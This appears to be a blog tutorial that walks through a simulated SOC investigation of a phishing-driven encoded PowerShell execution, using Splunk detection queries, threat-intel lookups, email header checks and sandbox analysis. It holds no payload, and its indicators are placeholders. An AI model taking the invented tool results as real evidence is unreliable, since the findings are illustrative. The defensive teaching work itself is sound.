Practical SOC Workflow: Step-by-Step Detection Using Splunk, Threat Intelligence, Email Forensics, and Malware Analysis

ratikraj01 -
May 13, 2026
Close-up image of a computer screen displaying colorful programming code in a warm setting.
SOC Tools

INTRODUCTION

This guide demonstrates a complete real-world SOC workflow using:

  • Splunk (Detection & Investigation)
  • Threat Intelligence tools
  • Email Forensics tools
  • Malware Analysis sandbox

The goal is to simulate a realistic attack and show exactly what steps to take using each tool.

🚨 SCENARIO

A suspicious PowerShell execution alert is triggered in Splunk.

We will investigate it step by step.

πŸ”Ή STEP 1 β€” DETECTION IN SPLUNK

What I did:

Opened Splunk β†’ Search & Reporting

Used query:

index=botsv3 sourcetype=”WinEventLog:Security” EventCode=4688
| search powershell

What I observed:

  • User: finance.user
  • Host: FIN-PC01
  • Parent Process: winword.exe
  • Child Process: powershell.exe
  • Command Line: contains -enc

Interpretation:

  • Word launching PowerShell = suspicious
  • Encoded command = high risk

πŸ”Ή STEP 2 β€” DEEP INVESTIGATION IN SPLUNK

What I did:

Searched for same user activity:

index=botsv3 EventCode=4688
| search Account_Name=”finance.user”

What I found:

  • Multiple PowerShell executions
  • Same time window

Interpretation:

  • Not a one-time event
  • Indicates scripted or automated activity

πŸ”Ή STEP 3 β€” EXTRACT INDICATORS

From the command line, I extracted:

  • Domain: example-malicious.com
  • IP: 185.x.x.x

πŸ”Ή STEP 4 β€” THREAT INTELLIGENCE CHECK

Tool 1: VirusTotal

What I did:

  • Opened VirusTotal
  • Searched domain

Result:

  • Flagged as malicious
  • Associated with malware

Tool 2: Talos Intelligence

What I did:

  • Checked domain reputation

Result:

  • Poor reputation

Tool 3: Shodan

What I did:

  • Checked IP

Result:

  • Known suspicious hosting

Interpretation:

πŸ‘‰ External infrastructure is malicious

πŸ”Ή STEP 5 β€” EMAIL FORENSICS

Goal:

Find how user got infected

Tool 1: MX Toolbox (Header Analyzer)

What I did:

  • Pasted email header

What I found:

  • SPF: Fail
  • DKIM: Fail
  • DMARC: Fail

Tool 2: EML Analyzer

What I did:

  • Opened email file

What I found:

  • Suspicious attachment
  • External sender

Interpretation:

πŸ‘‰ Phishing email confirmed

πŸ”Ή STEP 6 β€” MALWARE ANALYSIS

Tool 1: Any.run

What I did:

  • Uploaded suspicious file

What I observed:

  • PowerShell execution
  • Network connection

Tool 2: Hybrid Analysis

What I did:

  • Submitted file

Result:

  • Malicious score high
  • Behavior confirmed

Interpretation:

πŸ‘‰ File is malicious

πŸ”Ή STEP 7 β€” FULL ATTACK CHAIN

What I reconstructed:

  1. User receives phishing email
  2. User opens attachment
  3. Word launches PowerShell
  4. PowerShell executes encoded command
  5. Connects to malicious domain

πŸ”Ή STEP 8 β€” MITRE MAPPING

Mapped techniques:

  • T1566 β€” Phishing
  • T1059.001 β€” PowerShell Execution
  • T1204 β€” User Execution

πŸ”Ή STEP 9 β€” TICKET CREATION

What I wrote:

β€œSuspicious PowerShell execution detected on FIN-PC01.

Parent process: winword.exe
Encoded command observed
Malicious domain confirmed via threat intelligence
Email analysis indicates phishing origin

Escalating for further investigation.”

πŸ”Ή STEP 10 β€” DASHBOARD CREATION

What I did:

  • Created panel in Splunk
  • Added detection

Panel Title:

PowerShell Abuse – MITRE T1059.001

Purpose:

  • Monitor similar attacks
  • Track patterns
  • Provide visibility

πŸ”Ή STEP 11 β€” FINAL LEARNING (VERY IMPORTANT)

What I learned:

  • Splunk gives detection
  • Threat intel confirms indicators
  • Email shows entry point
  • Malware confirms behavior

🧠 FINAL FLOW SUMMARY

Splunk β†’ Detect
Threat Intel β†’ Validate
Email β†’ Entry point
Malware β†’ Confirm
Dashboard β†’ Monitor
Ticket β†’ Escalate

#No Tag

Comments are closed